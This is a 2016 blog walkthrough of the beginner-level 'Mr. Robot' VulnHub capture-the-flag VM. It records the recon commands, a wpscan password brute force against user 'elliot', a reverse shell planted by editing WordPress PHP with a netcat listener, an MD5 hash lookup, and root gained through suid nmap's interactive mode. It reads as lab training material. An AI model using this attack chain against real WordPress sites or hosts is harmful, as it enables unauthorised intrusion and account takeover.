Tuesday, July 5, 2016

fsociety - Mr. R0b0t

Mr. Robot vulnerable VM by jason

"Based on the show, Mr. Robot.
This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.
The VM isn't too difficult. There isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate."

Lets Reap Some Bytes

Command:  netdiscover -r

Command: nmap -sS -Pn -p1-65535

Sweet. Nothing but http/https running. 

Command:  nikto -host
Nice, word-press. 
This should definitely help us get a rev shell.

Command: wpscan --url

WPScan has revealed much of the same normal stuff. Although nikto did not tell us that a robots.txt was present so i will WGet the robots.txt file and see if there are any other clues to be found.
Command:  wget
Command: cat robots.txt
So robots.txt reveals our first key and a fsocity.dic file. We use wget to retrieve both.

First Key: 073403c8a58a1f80d943455fb30724b9

User Enumeration: 
So i decided to reinvent the wheel and create my own WordPress user enum tool. (WPScan can do this but i wanted to work in some python of my own, for learnings sake).

My Code
****NOTE: I opted not to use threading due to the small amount of enumberation that needs to occur. I would add multithreading if i was to use very large username lists ****

Command: python MrRobot_WPUsername_Enum.py /usr/share/wordlists/ByteReaper_Lists/Given-Names

Found User: elliot  (the name list i used is from outpost9)

Using the username elliot we should be able to bruteforce a password. I decided that the fsocity.dic file would be a good dictionary to use as it was given to us by the author :)
Command: wpscan --url --wordlist ~/Documents/MrRobot/fsocity.dic --threads 50 --username elliot

Awesome we have a hit...after 4 hours...because the password was the 2nd to last word in the list....thanks for that...

Upon logging in as elliot i was able to modify the php of the site to add a reverse shell.
Command: nc -lvp 80
Sweet we have a rev shell. Now lets power it up.
Command: python -c "import pty;pty.spawn('/bin/bash');"
Looking at the home folder we can see that robot is readable.
Command: ls -lah

Sweet the 2nd flag (we cannot read it currently, and admittedly i forgot to go back for it).
Command: cat password.raw-md5

Dropping the hash into the google resulted in "abcdefghijklmnopqrstuvwxyz". lul.

Command: su robot

(again i forgot to cat the 2-of-3-flag.txt file)...

I did a good amount of looking around for sudo -l, crons, etc. i found nothing much with any of them. But what i did find was a suid bit for nmap. Awesome nmap has an interactive mode. Lets see if we can get anything with it.
Command: nmap --interactive

Sweet. We got r00t. and our third flag.

w00t w00t. flag 3 ==>  04787ddef27c3dee1ee161b21670b4e4

Sorry for the abbreviated ending to this tutorial. I was trying to finish asap before the long weekend.

Thanks again to vulnhub for hosting this awesomeness.